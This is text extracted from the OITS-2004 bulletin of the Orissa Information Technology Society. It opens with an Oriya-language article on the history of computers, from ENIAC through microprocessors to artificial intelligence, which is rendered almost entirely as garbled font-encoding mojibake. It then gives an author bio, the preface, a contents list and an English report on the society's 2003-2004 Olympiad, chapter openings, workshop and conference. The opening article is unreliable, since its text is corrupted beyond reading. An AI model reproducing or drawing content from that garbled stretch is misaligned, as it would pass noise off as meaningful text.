AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 3: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

PREFACE

In one of the meetings of Orissa Information Technology Society (OITS)the executive committee decided to bring out a bulletin OITS Bulletin to bereleased once a year preferably at the time of CITs We had invited popularand semi-technical articles from different authors and released the first Bulletinas an humble beginning during December 2003 It was further decided by thecommittee to publish the Bulletin during June and December of each year Wecould not publish the June issue of the Bulletin due to lack of sufficient articlesWe hope more participation from OITS members in future

Jyotiranjan Sahu Satish Pradhan Jyotiranjan HotaChief Editor Editor Executive Editor

CONTENTS

1 Activities of OITS 2003-2004 SP Misra 1

2 The Transition from Physical Governance Raj Kumar Prasad 9to e-Governance

3 Application of Data Fusion in Computer Sateesh Pradhan ampForensics Suneeta Satpathy 16

4 Interesting Patterns in CITs A Misra 21

5 Experiences amp Learning from Organisingan International Conference in aDeveloping Country Laxman Mohanty 25

6 Guiding Seminars and Projects forUndergraduate Engineering Students M N Das 29

7 Case study on ICT and e-Gov Krishnan V D G 32Quarterly Progress Report (April-June 2003)

8 Known Malware Exploitation Abhishek Bhuyan 37

9 LOtilde EcircOcircVethornethorn S_ecirc J aTHORNLETHh OgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH 41

Orissa Information Technology Society(OITS)

From April 2003 to March 2004

A Orissa Information Technology Olympiad(Held on 7th September 2003 )

Orissa Information Technology Society(OITS) conducted the annual quiz test at senior(MCA BE BSc(Eng) and BSc(hons)) and junior(upto class XII) levels with separate questionson 7th September 2003 The test to be held onthe last sunday of august or the first sunday ofseptember was originally scheduled to be on31st august but was shifted by a week as ganeshpuja was there on that day We contactedBerhampur Puri SambalpurBurla RourkelaSarang Cuttack Raygada Balasore DamanjodiParadeep Angul and Bhubaneswar About 1200students registered for the same and aroundeleven hundred students appeared This yearthere was a very positive response from RourkelaSambalpurBurla Raygada and Balasore andsome other places as additional venues ProfSudarshan Padhy Coordinator IT Olympiadmainly organised this activity and he was ablyassisted by many volunteers including MTech(Comp Sc) students (they were not eligible tocontest) and young faculty members The resultsat senior and junior levels are as below

The first three rank holders in the seniorlevel were

1 Puspita Ray IMCA 9th Semester (Utkal Un)

2 Parthasarathi Dash Un College of Eng BE(cs) 7th Semester (burla)

Activities of OITS 2003-2004

SP Misra

3 Geeta Mohanty MCA 2nd Semester (KIIT bbs)

The first three rank holders in the juniorlevel were

1 Bagdevi Panda Class XII DAV Public SchoolCDA Cuttack

2 Siladitya Mohapatra Class X St Paul SchoolRourkela

3 Amulya Ratna Dash Class X BlessedSacrament High School Puri

Names of the other rank holders may beseen in the appropriate website

B Orissa IT Olympiad Prize Distribution held on 18th january 2004

The IT olympiad prize distribution functionwas held on 18th January 2004 at 230 pm TheChief Guest was Bikramjit Maitra Head InfosysCentre at Bhubaneswar and the guest of honourwas Gautam Parija administrative head InfosysCentre Bhubaneswar Arun SamantarayAdministrator Utkal University presided overthe function All the prize winners along withtheir teachers were invited to the function Alsothe parents of the prize winners at junior levelwere separetely invited There were altogetherabout 70 to 80 participants

The president of oits S P Misra welcomedthe participants Next Sudarshan PadhyCoordinator IT olympiad program spoke aboutthe conduct of the olympiad examination andreferred to the fact that on this occasion therewere about nineteen centres in which thestudents appeared spread all over Orissa

OITS-2004

1

OITS-2004

2

Prizes were distributed by the Chief GuestBikramjit Maitra In the senior category the firstsecond and third rank examinees were givencash prizes of Rs3000- Rs2000- andRs1000- respectively and consolation prizesof Rs500- each for the remaining eightexaminees above along with certificates In thejunior category also the first second and thirdrank examinees were given cash prizes ofRs3000- Rs2000- and Rs1000-respectively and consolation prizes of Rs500- each for the remaining nine examinees alongwith certificates Most of the prize winners tookthese prizes and for those who were absent theamounts along with the certificates were sentby courier

The Chief Guest addressed the gatheringemphasizing the relevance of IT in all phases ofour Society He also mentioned that Infosys hasalways wanted to increase the number ofselected candidates from Orissa if they satisfyminimal norms needed for it He mentioned thatparallel to Olympiad tests the selection processin Infosys takes into account not only thebackground knowledge of the candidates butalso their ability to think and adapt themselvesto learn new techniques in computer scienceGautam Parija also emphasized that for selectionin Infosys the ability of candidates as such shallalways be as important as the knowledge theyhave already acquired

Arun K Samantarai Administrator UtkalUniversity also focussed on the role of IT inSociety He particularly emphasized the needfor closer collaboration with industry to makesuch programs a success While all lauded thisactivity of oits Sri Samantarai emphasized thatassistance could be sought from Industry forsuch programs

S P Misra emphasized on two aspects foran extension of the Olympiad activity (i) Hementioned that there is an attempt to coordinatethis activity with a similar activity at all Indialevel so that they can avail of internationalcompetetion and that (ii) from next year we mayhave a short training program of the beststudents appearing in the olympiad On behalfof Infosys Mr Maitra assured that help for thiscan be available from them

There was then a tea break after which likelast year an interactive session was conductedin the presence of Bikramjit Maitra and GautamParija Here students asked many questionswhich were mainly answered by the visitorsalong with open house discussions participatedby many experts and students

The meeting ended with a vote of thanksby Ajit Nayak treasurer oits as the secretarywas absent

C Opening of SAMBALPUR CHAPTER inaugurated on 29112003

In october 2003 about eleven oits membersfrom sambalpur area wanted that we may openthe sambalpur chapter of oits The president thenlocated the earlier members around sambalpurarea and also asked some members outsideorissa whether they would like to join thischapter The executive committee which met on16112003 then approved that we may open thischapter as per article 6 of the bylaws andconvenor for this chapter B Patel of G M Collegesambalpur was intimated accordingly

The chapter was formally inaugurated byProf M C Dash vice-chancellor sambalpuruniversity in a function at G M College premiseson 29112003 Prof Arun Pujari of hyderabaduniversity was the chief speaker He gave anilluminating semi-technical talk on artificial

OITS-2004

3

intelligence The Secretary Dr B Patel talkedabout the interesting programs that were thereduring cit2003 and also about the futureprograms of the sambalpur chapter PrincipalG M College was the guest of honour and S PMisra president oits presided over the functionProf Pujari had also given a technical talk beforethe inauguration meeting

The chapter began with a seed money ofRs10800+Rs8000 with the first being from theregistration fees of fourteen members and thesecond being a donation by S P Misra as he hada speial attachment to sambalpur as his fatherProf Narayan Misra was the first principal ofGM College which was the beginning of highereducation in that area The name of the accountof sambalpur chapter is oits-sbp

The Secretary has subsequently intimatedthat the following are the office bearers of thechapter

1 President Prof S K Sanyal PrincipalUCE Burla

2 Vice-President Prof C R TripathyUCE Burla

3 Secretary Dr B Patel G M CollegeSambalpur

4 Treasurer Dr A P Dash G M CollegeSambalpur

D WORKSHOP ON PARALLEL COMPUTING AND BIOINFORMATICS

Organised by sambalpur chapter

22nd and 23rd March 2004

Here 141 delegates had registered for theworkshop Out of them there were 10 lifemembers of OIT-sbp 13 faculties from nearbycolleges rest being students from differentbranches like MCA Engnieering Msc comp scPhysics Mathematics Botany and Life Sciences

Professor Sudarsan Padhy UtkalUniversity Vanivihar delivered talks on parallelcomputing in three different sessions

On 220304 in the first session heillustrated the same through different exampleslike weather forecasting image processing etcemphasizing the importance of ParallelAlogorithms over serial Algorithms and takingdifferent examples developed the problems onParallel Algorithm In the second Session somemore developements in the problems of parallelalogorithms with multiprogramming and multiprocessing systems were considered

The uniqueness in the workshop waspractical demonstrations as needed Ajit kumarNayak Silicon Institute of TechnologyBhubaneswar demonstrated in two differentsessions about clustering of different workstations through Linux with the syntax to writeprograms using MPI The programmes weredemonstrated to the students This approachcreates a lot of interest among the students forthe problems of parallel algorithms

There were Two Tea Breaks and One lunchbreak for all the delegates

On 230304 Professor Padhy developed theproblems of parallel algorithms and proved theresults

Ajit Kumar Nayak demonstrated moreprograms of parallel algorithms to the delegates

In the after noon session Prof Padhydelivered a talk on Bio-Informatics which wasfollowed by another talk from Prof APDashGMCollege There were two Tea Breaks and onelunch for all the delegates

A feed back Form were circulated to alldeligates and their views were collected whichwas enthusiastic and positive

OITS-2004

4

The main feature of this workshop was itsmultidisciplinary nature with the delegates alsobelonging to diverse disciplines

E Opening of ROURKELA CHAPTER

In late december 2003 a letter was receivedfrom Prof Sourya Patnaik director rourkelainstitute of management studies (rims) with alist of ten new members from rims along with arequest to open a chapter of oits at rourkela TheInstitute was rated as among the top 40 B-schools and had MCA programs along withbusiness school programs We already had quitea few oits members in nit rourkela and it wasthought that such chapter shall be serving theaims and objectives of oits for the spread of ITin orissa

S Patnaik and sreekumar both of rims actedas convenors of the chapter They furtherrequested that they already had a program forfaculty improvement scheduled for 8th January2004 and it would be nice to inaugurate therourkela chapter of oits then with the facultyimprovement program being the first functionunder its auspices However as per rules oitsexecutive committee needs to approve theopening of a chapter for which time was notavailable Since opening of this chapter wastotally parallel to the opening of the sambalpurchapter the president rang up some executivecommittee members and with their approvalintimated Prof Patnaik that we may do so

The chapter was inaugurated on 8thjanuary 2004 by again Prof M C Dash vice-chancellor sambalpur university The functionwas attended by the president oits whowelcomed the delegates by Prof S Padhy whospoke about IT and oits Prof G Panda whoelaborated on many aspects of IT to emphasizethat IT is so interdisciplinary that it could hardly

be regarded as an independent subject ProfSourya Patnaik presided over the function andintimated that they had requested Prof Panda ofNIT Rourkela to be the president of the chapterand he had kindly agreed

One thing about Prof Pandas talkparticularly impressed me He said that he cantrain computer students to be self-reliant andthrough software development through thistraining earn their own livelihood at acomfortable level I do hope that through hisleadership this will come to happen in whichcase rourkela chapter will lead oits and all ITlovers about a very positive action

The afternoon programe was devoted to theworkshop on financial computation where anexpert from finance introduced the subject andProf Padhy talked about the computationalmodelling of the corresponding theories It wasattended by more than twenty-five participantsspread from different colleges in orissa It is verywell known that economic models have becomehighly mathematical and with the need for wide-scale data bases computational finance isbecoming a very important area of IT

The executive committee of oits met on1212004 where it discusssed about the openingof the rourkela chapter and approved the same

Rourkela chapter started with the seedmoney of Rs11210+Rs8000 the first abovebeing the money transferred from oitsmembership fees and the second being adonation by S P Misra who was Professor at(then) REC Rourkela for ten years He alsothought that the amount should be reasonablesince as per rules at least half of the aboveamount shall be kept as fixed deposit By theway this fixed deposit gives some stability tothe chapters where generally the members shall

OITS-2004

5

try to make the programs self-sustaining Thename of the bank account of the chapter is OITS-Rourkela

Rourkela chapter at present has seventeenmembers The secretary as below has intimatedthat the following office bearers have takencharge

1 President G Panda NIT Rourkela

2 Secretary D P Acharya RIMS

3 Treasurer Barnali Pradhan RIMS

Let us wish rourkela chapter all success

F Opening of BERHAMPUR CHAPTER

Some oits members of BerhampurUniversity NIST and NIC belonging toberhampur met on 29th March and resolved thatthey wish to open the berhampur chapter of oitsThey also elected the following members as officebearers

President M R Patra (BU)Vice-President R K Dash (NIC)Secretary Indraneel Mukhopadhyay (NIST)Treasurer S K Padhi (BU)

I received the above communication fromthe secretary on 3032004 We discussed thematter in the executive committee on 3132004and decided that the opening of the berhampurchapter be approved and that the same may befollowed up by the new executive committee

G OITS BULLETIN

OITS has started bringing out a Bulletinwith semi-technical articles with the first issue(December 2003) being inaugurated duringcit2003 It was initially thought that it would anyearly bulletin but then in the last general bodyit was decided that it may come out during Juneand December of every year This can be viewed

downloaded from the website This along withmany very interesting articles contains an articleby S P Misra indicating the gradual evolution ofoits

H CIT 2003

The Conference organised by OrissaInformation Technology Society (OITS) andSilicon Institute of Technology de facto extendedfrom 21st December to 25th December 2003 On21st there was a Symposium on IT andEducation mainly organised by the SiliconInstitute where there were seven speakers fromdifferent parts of India This was conducted byNeharika Vohra from IIM ahmedabad

In the afternoon the same day there wasan inauguration function for the ConferenceHere N R Mohanty Chairman HAL Bangalorewas the Chief Guest Damodar Acharya Vice-Chancellor Biju Patnaik University ofTechnology was the guest of honour and VinayDeshpande chairman Encore Software Pvt LtdBangalore was the Chief Speaker P K Dashwelcomed all Sudeshna Sarkar spoke about theConference and S P Misra gave a vote of thanksAll the three guests gave wonderful inspiringtalks with a common theme being to have a senseof confidence by all of us that things arehappening will happen and in IT or in otherfields we need not be second to any othercountry

The main Conference was from 22ndDecember to 24th December in Swosti PlazaBhubaneswar During the Conference therewere three keynote talks (by (i) S K TripathyUCR USA (ii) Y Pratt UT Arlington USA (iii)Sajal Das UT Arlington USA) eight invited talksand three advanced tutorials Around 230delegates from 12 countries including Indiaregistered for the Conference and 122 presented

OITS-2004

6

their papers in the different technical sessionsThere was also an industry session with thetheme as India sustaining leadership positionin the global IT market

On 24th afternoon the valedictory functiontook place as the last function of the ConferenceS P Misra President OITS conducted the sameThe program chairs briefly recapitulated thesalient features of the Conference and then asin the last year the results of the two best paperawards were given (i) Amiya K Pujari IT awardof Rs5000- and a certificate for the best paperamong all the papers submitted and presentedin the Conference went to Joydeep Ghosh ofUniversity of Texas Austin USA for the paperentitled A probabilistic approach to privacy-sensitive distributed data mining done incollaboration with Srujana Merigu (ii) NarayanMisra IT award of Rs4000- and a certificatefor the best paper among all the papers submittedfrom Orissa and presented in the Conferencewent to D P Das Silicon Inst of Tech bbsr forthe paper entitled Electricity distribution datamining using soft computing and modifiedwavelet analysis done in collaboration with PK Dash

On 25th December in addition to the threeadvanced tutorials during the Conference sixtutorials were organised two of six hourduration and four of three hour duration atHotel Swosti Plaza All the tutorials wereapproximately with sixty participants each andwere well received

